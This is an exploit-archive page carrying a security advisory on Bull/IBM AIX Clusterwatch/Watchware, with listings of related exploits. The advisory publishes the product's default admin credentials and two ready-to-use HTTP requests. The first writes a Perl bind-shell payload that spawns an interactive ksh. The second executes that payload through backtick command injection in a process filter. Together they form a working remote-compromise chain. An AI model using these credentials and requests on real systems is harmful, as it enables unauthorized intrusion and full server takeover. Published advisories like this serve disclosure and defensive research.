Menu

Search for hundreds of thousands of exploits

"Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities"

Author

Exploit author

RandoriSec

Platform

Exploit platform

aix

Release date

Exploit published date

2017-03-07

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
Bull Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters.

Marble effect in the web banner and questionable font: it smells the 90s !

Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it:

Trivial admin credentials
Authenticated user can write on the system file
Authenticated user can inject OS commands
By combining these three vulnerabilities an attacker can fully compromise servers running Watchware.

We tried to contact Bull to report this more than one year ago without any success, but the devs are probably retired now so that doesnt matter, lets do some archeology alone.

Here are the details:


1. Trivial creds: smwadmin/bullsmw

2. Authenticated user can write on the system file

A page allows sysadmins to customize a few things including filters that are used in the process listing page (the tool allows you to list your running processes).

But these filters are written on disk and you can call them using the following OS command injection.

Request to write the shellcode:

http://host:9696/clw/cgi-bin/adm/bclw_updatefile.cgi?cluster=clustername&node=nodename&alarm=%0D%0Aswap_adapter%0D%0Anode_down%0D%0Anode_up%0D%0Anetwork_down%0D%0Anetwork_up%0D%0Astate%0D%0Ahacmp%0D%0Astop%0D%0Aaix%0D%0A&day=1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A7%0D%0A8%0D%0A15%0D%0A30%0D%0A45%0D%0A0%0D%0A&hour=0%0D%0A1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A12%0D%0A18%0D%0A23%0D%0A&proc=perl%20-e%20'use%20Socket;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,%20INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close%20C){open(STDIN,">%26C");open(STDOUT,">%26C");open(STDERR,">%26C");exec("/bin/ksh%20-i");};'%0D%0A%0D%0A&lpp=%0D%0Acluster%0D%0A&refr=0%0D%0A

The shellcode we used:

perl -e 'use Socket;$p=2223;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/ksh -i");};'

3. Authenticated user can inject OS commands

When listing the processes you can apply a filter and inject a single command using backticks, great !

Very useful to execute our shellcode which was stored in a single file (the filter).

Request to execute the shellcode:

http://host:9696/clw/cgi-bin/adm/bclw_stproc.cgi?cluster=clustername&node=nodename&proc_filter=smw`/usr/sbin/bullcluster/monitoring/clw/web/conf/proc_filter.txt`"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2018-12-04 "Xorg X11 Server (AIX) - Local Privilege Escalation" local aix 0xdono
2017-03-07 "Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities" webapps aix RandoriSec
2016-12-22 "IBM AIX 6.1/7.1/7.2 - 'Bellmail' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 6.1/7.1/7.2.0.2 - 'lsmcode' Local Privilege Escalation" local aix "Hector X. Monsegur"
2016-11-04 "IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Local Privilege Escalation" local aix "Hector X. Monsegur"
2015-10-30 "AIX 7.1 - 'lquerylv' Local Privilege Escalation" local aix "S2 Crew"
2015-09-08 "IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation" local aix "Kristian Erik Hermansen"
2014-11-24 "RobotStats 1.0 - HTML Injection" dos aix "ZoRLu Bugrahan"
2014-09-09 "PHP Stock Management System 1.02 - Multiple Vulnerabilities" dos aix jsass
2014-07-01 "Flussonic Media Server 4.1.25 < 4.3.3 - Arbitrary File Disclosure" dos aix "BGA Security"
Release Date Title Type Platform Author
2019-10-22 "Moxa EDR-810 - Command Injection / Information Disclosure" remote hardware RandoriSec
2018-07-02 "Geutebruck 5.02024 G-Cam/EFD-2250 - 'simple_loglistjs.cgi' Remote Command Execution (Metasploit)" webapps hardware RandoriSec
2017-03-07 "Bull/IBM AIX Clusterwatch/Watchware - Multiple Vulnerabilities" webapps aix RandoriSec
2017-02-15 "Geutebruck 5.02024 G-Cam/EFD-2250 - 'testaction.cgi' Remote Command Execution (Metasploit)" webapps hardware RandoriSec 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected